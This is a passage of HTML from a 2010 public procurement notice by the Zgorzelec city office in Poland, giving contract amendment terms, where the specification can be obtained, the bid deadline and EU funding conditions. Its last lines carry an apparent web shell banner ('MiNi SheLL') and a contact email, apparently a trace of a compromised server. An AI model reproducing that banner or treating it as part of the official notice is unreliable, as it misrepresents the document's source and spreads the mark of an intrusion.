4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com